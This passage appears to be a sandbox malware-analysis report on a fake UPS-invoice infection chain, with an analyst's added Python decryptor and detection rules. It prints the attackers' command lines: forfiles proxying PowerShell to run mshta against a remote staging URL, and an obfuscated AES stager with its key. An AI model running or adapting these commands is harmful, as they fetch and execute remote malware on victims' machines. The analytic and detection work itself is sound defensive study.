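        "sections": nsections,
        "timestamp": timestamp,
        "link_time_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "characteristics": characteristics,
        "optional_header_size": opt_size,
        "entry_point_rva": entry_rva,
        "image_base": image_base,
        "size_of_image": size_of_image,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "dll_characteristics": sorted(n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit),
    }


if __name__ == "__main__":
    for key, value in parse_pe_head(parse_report_hex(PUTTY_HEAD_HEX)).items():
        print("%-22s %s" % (key, hex(value) if isinstance(value, int) else value))
```

On the bytes above this reports an x64 PE32+ GUI executable with 10 sections, link timestamp 0x66111abf (2024-04-06 09:49:51 UTC), image base 0x140000000 and the DYNAMIC_BASE, HIGH_ENTROPY_VA and NX_COMPAT flags set. The server's Content-Length (1663264) equals the size of the dropped C:\Users\user\AppData\Roaming\putty.exe in Target ID 12 (1'663'264 bytes), so the MD5 the report gives for that file (5EFEF6CC9CD24BAEEED71C1107FC32DF) is the hash of the complete download.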


                    Session ID: 3
                    Source IP: 192.168.2.8
                    Source Port: 49723
                    Destination IP: 104.77.220.172
                    Destination Port: 443
                    PID: 7540
                    Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Timestamp, Bytes transferred, Direction: Data
                    2024-07-02 10:47:40 UTC, 475 bytes, OUT: GET /onboarding/smskillreader.txt HTTP/1.1
                    Host: armmf.adobe.com
                    Connection: keep-alive
                    Accept-Language: en-US,en;q=0.9
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    If-None-Match: "78-5faa31cce96da"
                    If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                    2024-07-02 10:47:40 UTC, 198 bytes, IN: HTTP/1.1 304 Not Modified
                    Content-Type: text/plain; charset=UTF-8
                    Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                    ETag: "78-5faa31cce96da"
                    Date: Tue, 02 Jul 2024 10:47:40 GMT
                    Connection: close


                    Target ID:1
                    Start time:06:47:16
                    Start date:02/07/2024
                    Path:C:\Windows\System32\forfiles.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage"
                    Imagebase:0x7ff7b19d0000
                    File size:52'224 bytes
                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:2
                    Start time:06:47:16
                    Start date:02/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6ee680000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:06:47:16
                    Start date:02/07/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:. mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage
                    Imagebase:0x7ff6cb6b0000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:06:47:18
                    Start date:02/07/2024
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage
                    Imagebase:0x7ff7fd880000
                    File size:14'848 bytes
                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:6
                    Start time:06:47:21
                    Start date:02/07/2024
                    Path:C:\Windows\System32\svchost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Imagebase:0x7ff67e6d0000
                    File size:55'320 bytes
                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:7
                    Start time:06:47:22
                    Start date:02/07/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg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fcuYB = [System.Security.Cryptography.Aes]::Create();$fcuYB.Key = FwbFg('615241616D494A7A70714B63736F6771');$fcuYB.IV = New-Object byte[] 16;$uIvTQuuE = $fcuYB.CreateDecryptor();$TRZjYlWGC = $uIvTQuuE.TransformFinalBlock($JMNVEMgx, 0, $JMNVEMgx.Length);$xbgxJDMGJ = [System.Text.Encoding]::Utf8.GetString($TRZjYlWGC);$uIvTQuuE.Dispose();& $xbgxJDMGJ.Substring(0,3) $xbgxJDMGJ.Substring(3)
                    Imagebase:0x7ff6cb6b0000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true
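
Target ID 7 is the decrypt-and-invoke stage: the hex blob passed to FwbFg is the ciphertext, the key is the hex string shown, the IV is sixteen zero bytes, and after AES decryption the UTF-8 plaintext is run as "& <first three characters> <rest>". The Python below is an added example (mine, not the report's code and not a tool it names) that re-implements that pipeline so the payload can be recovered offline instead of executed. It uses the cryptography package, assumes the .NET defaults of CBC mode and PKCS7 padding for Aes.Create(), and, because the report elides the ciphertext, encrypts a constructed plaintext with the same parameters to show the round trip. Function names are mine.

```python
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Values taken from the Target ID 7 command line.
KEY_HEX = "615241616D494A7A70714B63736F6771"   # $fcuYB.Key = FwbFg('6152...')
ZERO_IV = bytes(16)                            # $fcuYB.IV = New-Object byte[] 16


def fwbfg(hex_pairs):
    """Python twin of FwbFg(): -split ($s -replace '..', '0x$& ') coerced to byte[]."""
    return bytes.fromhex(hex_pairs)


def _aes_cbc(key_hex):
    # Aes.Create() in .NET defaults to CBC with PKCS7 padding (assumed here).
    return Cipher(algorithms.AES(fwbfg(key_hex)), modes.CBC(ZERO_IV))


def stager_decrypt(cipher_hex, key_hex=KEY_HEX):
    """Recover the UTF-8 plaintext the stager would execute, without executing it."""
    dec = _aes_cbc(key_hex).decryptor()
    padded = dec.update(fwbfg(cipher_hex)) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return (unpad.update(padded) + unpad.finalize()).decode("utf-8")


def split_invocation(plaintext):
    """'& $x.Substring(0,3) $x.Substring(3)': three-character command, then its argument."""
    return plaintext[:3], plaintext[3:]


def stager_encrypt(plaintext, key_hex=KEY_HEX):
    """Demo helper only: produce ciphertext in the stager's format (hex pairs)."""
    pad = padding.PKCS7(128).padder()
    padded = pad.update(plaintext.encode("utf-8")) + pad.finalize()
    enc = _aes_cbc(key_hex).encryptor()
    return (enc.update(padded) + enc.finalize()).hex().upper()


# Constructed demo: the report shows neither the real ciphertext nor the plaintext.
DEMO_PLAINTEXT = "iexWrite-Host 'constructed demo payload'"
DEMO_CIPHER_HEX = stager_encrypt(DEMO_PLAINTEXT)

if __name__ == "__main__":
    recovered = stager_decrypt(DEMO_CIPHER_HEX)
    print("key bytes:", fwbfg(KEY_HEX))
    print("command  :", split_invocation(recovered))
```

To apply it to the real sample, pass the hex string from the FwbFg(...) call to stager_decrypt() and print the result; never invoke it. Because the IV is fixed at zero and the key is constant, identical stages always encrypt to identical ciphertext, which makes the blob itself a usable indicator.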

                    Target ID:8
                    Start time:06:47:22
                    Start date:02/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6ee680000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:9
                    Start time:06:47:25
                    Start date:02/07/2024
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\upsinvoice.pdf"
                    Imagebase:0x7ff6e8200000
                    File size:5'641'176 bytes
                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:10
                    Start time:06:47:26
                    Start date:02/07/2024
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                    Imagebase:0x7ff79c940000
                    File size:3'581'912 bytes
                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:11
                    Start time:06:47:26
                    Start date:02/07/2024
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1612,i,8777765815647240149,11795078331004045366,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                    Imagebase:0x7ff79c940000
                    File size:3'581'912 bytes
                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:12
                    Start time:06:47:29
                    Start date:02/07/2024
                    Path:C:\Users\user\AppData\Roaming\putty.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\AppData\Roaming\putty.exe"
                    Imagebase:0x7ff6785d0000
                    File size:1'663'264 bytes
                    MD5 hash:5EFEF6CC9CD24BAEEED71C1107FC32DF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 0%, ReversingLabs
                    Reputation:low
                    Has exited:false
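
The process list above reads as one chain: forfiles.exe, a signed Windows binary, used as a proxy to start PowerShell; PowerShell starting mshta.exe with a remote URL; mshta.exe starting a hidden PowerShell carrying the AES stager; and that PowerShell dropping both the decoy upsinvoice.pdf (opened in Acrobat, whose own AcroCEF request to armmf.adobe.com is session 3) and putty.exe under AppData\Roaming. The Python below is an added example (mine, not the report's and not Sigma's or Joe Sandbox's rule code) that codifies the chain as process-creation rules and runs them over records constructed from the Target ID entries. The parent links are inferred from the command lines and the report's Sigma hits, explorer.exe as the parent of forfiles.exe is an assumption, and the stager command line is shortened to omit the ciphertext the report also elides.

```python
import re

# Process-creation records constructed from the Target ID entries above.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
FORFILES = r"C:\Windows\System32\forfiles.exe"
STAGE_URL = "https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage"

# Target ID 7, shortened: the ciphertext hex passed to FwbFg is omitted ('...').
STAGER_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop '
    r"function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};"
    r"$JMNVEMgx = FwbFg('...');$fcuYB = [System.Security.Cryptography.Aes]::Create();"
    r"$fcuYB.Key = FwbFg('615241616D494A7A70714B63736F6771');$fcuYB.IV = New-Object byte[] 16;"
    r"$uIvTQuuE = $fcuYB.CreateDecryptor();"
    r"$TRZjYlWGC = $uIvTQuuE.TransformFinalBlock($JMNVEMgx, 0, $JMNVEMgx.Length);"
    r"$xbgxJDMGJ = [System.Text.Encoding]::Utf8.GetString($TRZjYlWGC);$uIvTQuuE.Dispose();"
    r"& $xbgxJDMGJ.Substring(0,3) $xbgxJDMGJ.Substring(3)"
)

# ParentImage values are inferred; explorer.exe for Target 1 is an assumption.
SAMPLE_EVENTS = [
    {"target": 1, "Image": FORFILES, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta ' + STAGE_URL + '"'},
    {"target": 3, "Image": PS, "ParentImage": FORFILES, "CommandLine": ". mshta " + STAGE_URL},
    {"target": 4, "Image": MSHTA, "ParentImage": PS, "CommandLine": r'"C:\Windows\system32\mshta.exe" ' + STAGE_URL},
    {"target": 7, "Image": PS, "ParentImage": MSHTA, "CommandLine": STAGER_CMDLINE},
    {"target": 8, "Image": r"C:\Windows\System32\conhost.exe", "ParentImage": PS,
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"target": 9, "Image": r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe", "ParentImage": PS,
     "CommandLine": r'"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\upsinvoice.pdf"'},
    {"target": 12, "Image": r"C:\Users\user\AppData\Roaming\putty.exe", "ParentImage": PS,
     "CommandLine": r'"C:\Users\user\AppData\Roaming\putty.exe"'},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
LOLBIN_IMAGES = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
                 "certutil.exe", "bitsadmin.exe", "msiexec.exe"}
LOLBIN_WORDS = re.compile(r"\b(?:powershell|pwsh|cmd|mshta|rundll32|regsvr32|wscript|cscript|certutil|bitsadmin)(?:\.exe)?\b", re.I)
URL = re.compile(r"https?://", re.I)


def basename(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def rule_forfiles_proxy(ev):
    # forfiles /c running another interpreter instead of acting on the matched files
    if basename(ev["Image"]) != "forfiles.exe":
        return False
    parts = re.split(r"\s/c\s", ev["CommandLine"], maxsplit=1, flags=re.I)
    return len(parts) == 2 and LOLBIN_WORDS.search(parts[1]) is not None


def rule_mshta_remote(ev):
    # mshta given a URL: remote HTA execution
    return basename(ev["Image"]) == "mshta.exe" and URL.search(ev["CommandLine"]) is not None


def rule_powershell_spawns_lolbin(ev):
    return basename(ev["ParentImage"]) in POWERSHELL and basename(ev["Image"]) in LOLBIN_IMAGES


def rule_mshta_spawns_powershell(ev):
    return basename(ev["ParentImage"]) == "mshta.exe" and basename(ev["Image"]) in POWERSHELL


def rule_powershell_encrypted_stager(ev):
    # hidden or unrestricted PowerShell decrypting a blob with .NET AES in its own command line
    if basename(ev["Image"]) not in POWERSHELL:
        return False
    cl = ev["CommandLine"]
    policy = re.search(r"-e(?:xecutionpolicy|p)\s+(?:unrestricted|bypass)\b", cl, re.I)
    hidden = re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", cl, re.I)
    crypto = re.search(r"System\.Security\.Cryptography\.(?:Aes|Rijndael)", cl, re.I) and "TransformFinalBlock" in cl
    return bool(crypto and (policy or hidden))


def rule_appdata_exe_from_powershell(ev):
    # executable started by PowerShell straight out of the AppData\Roaming root
    img = ev["Image"].lower()
    return (re.search(r"\\appdata\\roaming\\[^\\]+\.exe$", img) is not None
            and basename(ev["ParentImage"]) in POWERSHELL)


RULES = {
    "forfiles_proxy_execution": rule_forfiles_proxy,
    "mshta_remote_hta": rule_mshta_remote,
    "powershell_spawns_lolbin": rule_powershell_spawns_lolbin,
    "mshta_spawns_powershell": rule_mshta_spawns_powershell,
    "powershell_encrypted_stager": rule_powershell_encrypted_stager,
    "appdata_exe_from_powershell": rule_appdata_exe_from_powershell,
}


def evaluate(events):
    """Map each record's target id to the rule names that fired; silent records are omitted."""
    hits = {}
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits[ev["target"]] = fired
    return hits


if __name__ == "__main__":
    for target, fired in evaluate(SAMPLE_EVENTS).items():
        print("Target", target, "->", ", ".join(fired))
```

Run over the records, Targets 1, 4, 7 and 12 fire and the conhost.exe and Acrobat.exe children stay silent, which is the point: the decoy PDF being opened looks like any other document and is not what distinguishes this chain.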

                      Memory Dump Source
                      • Source File: 00000004.00000003.1780749027.0000023F9FCE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000023F9FCE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_3_23f9fce0000_mshta.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction ID: b3629e91c4070d69ed4a0c60f5fec3af22167740d9133970966d3793c6667f95
                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction Fuzzy Hash: 769002048D960655D45511D11D4939C50406388151FD588904417A0144D44D07A65192
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775325123.00007FFB49B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49b20000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: H
                      • API String ID: 0-2852464175
                      • Opcode ID: 3aec3d3eec9a234a90cb97ecc66295058529cd20185fbe9625aa89f205acb718
                      • Instruction ID: 7f894241a2bcb9363d4cfc19086f1f0403199f18f76dd3a61286844d2591ff45
                      • Opcode Fuzzy Hash: 3aec3d3eec9a234a90cb97ecc66295058529cd20185fbe9625aa89f205acb718
                      • Instruction Fuzzy Hash: 3AD18370A1CA4E8FDF95EF68C445AA97BF1FF68300F144169D449D7695CA34EC42CB81
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775325123.00007FFB49B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49b20000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: af31815677304dd36b5c59ba6d51f41190a97d08229d6e19e836d59855bb6763

                      Execution Graph

                      Execution Coverage: 2.9%
                      Dynamic/Decrypted Code Coverage: 0%
                      Signature Coverage: 47.1%
                      Total number of Nodes: 2000
                      Total number of Limit Nodes: 55
7ff67861dc42 87534->87535 87536 7ff678626360 134 API calls 87535->87536 87537 7ff67861dc6f 87536->87537 87538 7ff6786251e0 134 API calls 87537->87538 87539 7ff67861dc88 87538->87539 87540 7ff678625360 134 API calls 87539->87540 87541 7ff67861dca1 87540->87541 87542 7ff678626360 134 API calls 87541->87542 87543 7ff67861dcd1 87542->87543 87544 7ff678625a00 134 API calls 87543->87544 87545 7ff67861dd68 87544->87545 87546 7ff678625360 134 API calls 87545->87546 87547 7ff67861dd81 87546->87547 87548 7ff678626360 134 API calls 87547->87548 87549 7ff67861ddb1 87548->87549 88278 7ff678625e10 87549->88278 87551 7ff67861ddf0 87552 7ff678625e10 134 API calls 87551->87552 87553 7ff67861de21 87552->87553 87554 7ff678625e10 134 API calls 87553->87554 87555 7ff67861de52 87554->87555 87556 7ff678625360 134 API calls 87555->87556 87557 7ff67861de6b 87556->87557 87558 7ff678626360 134 API calls 87557->87558 87559 7ff67861de9b 87558->87559 87560 7ff6786251e0 134 API calls 87559->87560 87561 7ff67861deb4 87560->87561 87562 7ff678625360 134 API calls 87561->87562 87563 7ff67861decd 87562->87563 88285 7ff6786255e0 87563->88285 87565 7ff67861dedd 87566 7ff678625d10 134 API calls 87565->87566 87567 7ff67861df15 87566->87567 87568 7ff6786134f0 134 API calls 87567->87568 87569 7ff67861df3b 87568->87569 87570 7ff678625680 134 API calls 87569->87570 87571 7ff67861df92 87570->87571 87572 7ff678625800 134 API calls 87571->87572 87573 7ff67861dfd0 87572->87573 87574 7ff678625c30 134 API calls 87573->87574 87575 7ff67861e002 87574->87575 87576 7ff678625680 134 API calls 87575->87576 87577 7ff67861e020 87576->87577 87578 7ff6786251e0 134 API calls 87577->87578 87579 7ff67861e039 87578->87579 87580 7ff678625360 134 API calls 87579->87580 87581 7ff67861e052 87580->87581 87582 7ff678626360 134 API calls 87581->87582 87583 7ff67861e082 87582->87583 87584 7ff678626360 134 API calls 87583->87584 87585 7ff67861e0af 87584->87585 87586 7ff678626360 134 API calls 87585->87586 87587 7ff67861e0dc 87586->87587 
87588 7ff678625a00 134 API calls 87587->87588 87589 7ff67861e177 87588->87589 87590 7ff678612890 134 API calls 87589->87590 87591 7ff67861e18a 87590->87591 87592 7ff678625360 134 API calls 87591->87592 87593 7ff67861e1a2 87592->87593 87594 7ff6786262b0 134 API calls 87593->87594 87595 7ff67861e1c6 87594->87595 87596 7ff678625680 134 API calls 87595->87596 87597 7ff67861e1df 87596->87597 87598 7ff6786255e0 134 API calls 87597->87598 87599 7ff67861e1ec 87598->87599 87600 7ff678625d10 134 API calls 87599->87600 87601 7ff67861e21d 87600->87601 87602 7ff6786262b0 134 API calls 87601->87602 87603 7ff67861e245 87602->87603 87604 7ff678625800 134 API calls 87603->87604 87605 7ff67861e28a 87604->87605 87606 7ff678625800 134 API calls 87605->87606 87607 7ff67861e2d3 87606->87607 87608 7ff678625800 134 API calls 87607->87608 87609 7ff67861e31c 87608->87609 87610 7ff678625c30 134 API calls 87609->87610 87611 7ff67861e34e 87610->87611 87612 7ff678625680 134 API calls 87611->87612 87613 7ff67861e36c 87612->87613 87614 7ff67861e980 87613->87614 87615 7ff6786251e0 134 API calls 87613->87615 87616 7ff6786251e0 134 API calls 87614->87616 87623 7ff67861edaa 87614->87623 87617 7ff67861e393 87615->87617 87619 7ff67861e9d8 87616->87619 87618 7ff678625360 134 API calls 87617->87618 87624 7ff67861e3ac 87618->87624 87620 7ff678625360 134 API calls 87619->87620 87621 7ff67861e9ed 87620->87621 87628 7ff678625e10 134 API calls 87621->87628 87622 7ff6786251e0 134 API calls 87625 7ff67861ee06 87622->87625 87623->87622 87640 7ff67862067f 87623->87640 87630 7ff678625800 134 API calls 87624->87630 87626 7ff67861ee0b 87625->87626 87627 7ff67861ee62 87625->87627 87633 7ff678625360 134 API calls 87626->87633 87644 7ff67861ee4b 87626->87644 87629 7ff678625360 134 API calls 87627->87629 87631 7ff67861ea2c 87628->87631 87641 7ff67861ee82 87629->87641 87632 7ff67861e402 87630->87632 87634 7ff678625680 134 API calls 87631->87634 87632->87623 87638 7ff678625360 134 API calls 87632->87638 87636 7ff67861ee39 
87633->87636 87645 7ff67861ea45 87634->87645 87635 7ff678625360 134 API calls 87637 7ff67861ef3e 87635->87637 87639 7ff6786262b0 134 API calls 87636->87639 87650 7ff678626360 134 API calls 87637->87650 87642 7ff67861e433 87638->87642 87639->87644 87643 7ff6786208bd 87640->87643 87646 7ff6786251e0 134 API calls 87640->87646 87651 7ff678625800 134 API calls 87641->87651 87659 7ff678626360 134 API calls 87642->87659 87652 7ff6786251e0 134 API calls 87643->87652 87658 7ff678620a87 87643->87658 87644->87635 87647 7ff67861f343 87644->87647 87653 7ff678625800 134 API calls 87645->87653 87649 7ff6786206c9 87646->87649 87648 7ff678625360 134 API calls 87647->87648 87654 7ff67861f360 87648->87654 87655 7ff67862073a 87649->87655 87661 7ff678625360 134 API calls 87649->87661 87656 7ff67861ef6e 87650->87656 87657 7ff67861eed1 87651->87657 87660 7ff6786208fd 87652->87660 87682 7ff67861ea9b 87653->87682 87673 7ff678625c30 134 API calls 87654->87673 87664 7ff678625360 134 API calls 87655->87664 87662 7ff67861f0db 87656->87662 87668 7ff678625360 134 API calls 87656->87668 87663 7ff678625360 134 API calls 87657->87663 87670 7ff6786251e0 134 API calls 87658->87670 87675 7ff678620b24 87658->87675 87665 7ff67861e463 87659->87665 87666 7ff678625360 134 API calls 87660->87666 87690 7ff6786206eb 87661->87690 87667 7ff67861f33e 87662->87667 87681 7ff6786251e0 134 API calls 87662->87681 87669 7ff67861eeea 87663->87669 87683 7ff678620757 87664->87683 87679 7ff678626360 134 API calls 87665->87679 87710 7ff678620916 87666->87710 87667->87647 87672 7ff67861f3ab 87667->87672 87674 7ff67861ef97 87668->87674 87688 7ff678626360 134 API calls 87669->87688 87677 7ff678620abc 87670->87677 87671 7ff678620a2d 87694 7ff678626360 134 API calls 87671->87694 87680 7ff678625360 134 API calls 87672->87680 87700 7ff67861f394 87673->87700 87698 7ff678626360 134 API calls 87674->87698 87676 7ff678620cb6 87675->87676 87687 7ff6786251e0 134 API calls 87675->87687 87676->87185 87678 7ff678625360 134 API calls 
87677->87678 87709 7ff678620ad5 87678->87709 87684 7ff67861e490 87679->87684 87686 7ff67861f3cb 87680->87686 87689 7ff67861f106 87681->87689 87697 7ff678625800 134 API calls 87682->87697 87699 7ff678625800 134 API calls 87683->87699 87691 7ff678625360 134 API calls 87684->87691 87685 7ff67861fe5a 87696 7ff6786251e0 134 API calls 87685->87696 87692 7ff678625680 134 API calls 87686->87692 87693 7ff678620b59 87687->87693 87688->87644 87695 7ff678625360 134 API calls 87689->87695 87707 7ff678625800 134 API calls 87690->87707 87737 7ff67861e4a9 87691->87737 87701 7ff67861f3e7 87692->87701 87702 7ff678625360 134 API calls 87693->87702 87703 7ff678620a5a 87694->87703 87704 7ff67861f122 87695->87704 87705 7ff67861fe73 87696->87705 87706 7ff67861eaee 87697->87706 87708 7ff67861efca 87698->87708 87726 7ff6786207a9 87699->87726 87700->87685 87711 7ff6786251e0 134 API calls 87700->87711 87712 7ff6786262b0 134 API calls 87701->87712 87729 7ff678620b6e 87702->87729 87724 7ff678626360 134 API calls 87703->87724 88318 7ff678625f20 134 API calls 87704->88318 87713 7ff678625360 134 API calls 87705->87713 87714 7ff678625680 134 API calls 87706->87714 87707->87655 87715 7ff6786262b0 134 API calls 87708->87715 87720 7ff678625800 134 API calls 87709->87720 87710->87671 87721 7ff678625a00 134 API calls 87710->87721 87716 7ff67861f594 87711->87716 87717 7ff67861f400 87712->87717 87718 7ff67861fe8c 87713->87718 87733 7ff67861eb08 87714->87733 87719 7ff67861efdc 87715->87719 87722 7ff678625360 134 API calls 87716->87722 87723 7ff6786255e0 134 API calls 87717->87723 87732 7ff678626360 134 API calls 87718->87732 87731 7ff678626360 134 API calls 87719->87731 87720->87675 87755 7ff6786209b3 87721->87755 87727 7ff67861f5ad 87722->87727 87728 7ff67861f414 87723->87728 87724->87658 87736 7ff678625800 134 API calls 87726->87736 88321 7ff678625f20 134 API calls 87727->88321 87741 7ff678625c30 134 API calls 87728->87741 87738 7ff678625800 134 API calls 87729->87738 87730 7ff67861f159 87742 
7ff678626360 134 API calls 87730->87742 87735 7ff67861f005 87731->87735 87734 7ff67861febf 87732->87734 87739 7ff678625800 134 API calls 87733->87739 87747 7ff678626360 134 API calls 87734->87747 87748 7ff678626360 134 API calls 87735->87748 87753 7ff6786207f1 87736->87753 87749 7ff678625a00 134 API calls 87737->87749 87771 7ff678620bbd 87738->87771 87743 7ff67861eb57 87739->87743 87745 7ff67861f445 87741->87745 87746 7ff67861f18d 87742->87746 87757 7ff678626360 134 API calls 87743->87757 87744 7ff67861f5e4 87760 7ff678626360 134 API calls 87744->87760 87761 7ff678625d10 134 API calls 87745->87761 87750 7ff678625360 134 API calls 87746->87750 87751 7ff67861fee8 87747->87751 87752 7ff67861f02e 87748->87752 87754 7ff67861e561 87749->87754 87766 7ff67861f1a6 87750->87766 87756 7ff678625680 134 API calls 87751->87756 87758 7ff678625360 134 API calls 87752->87758 87763 7ff678625800 134 API calls 87753->87763 87769 7ff678625360 134 API calls 87754->87769 87759 7ff678625a00 134 API calls 87755->87759 87762 7ff67861ff09 87756->87762 87786 7ff67861eb80 87757->87786 87787 7ff67861f047 87758->87787 87759->87671 87764 7ff67861f614 87760->87764 87765 7ff67861f47a 87761->87765 87767 7ff6786262b0 134 API calls 87762->87767 87768 7ff67862083d 87763->87768 87764->87685 87773 7ff6786251e0 134 API calls 87764->87773 87774 7ff678625800 134 API calls 87766->87774 87772 7ff67861ff22 87767->87772 87778 7ff678625e10 134 API calls 87768->87778 87782 7ff67861e599 87769->87782 87780 7ff678625a00 134 API calls 87771->87780 87776 7ff67861f636 87773->87776 87789 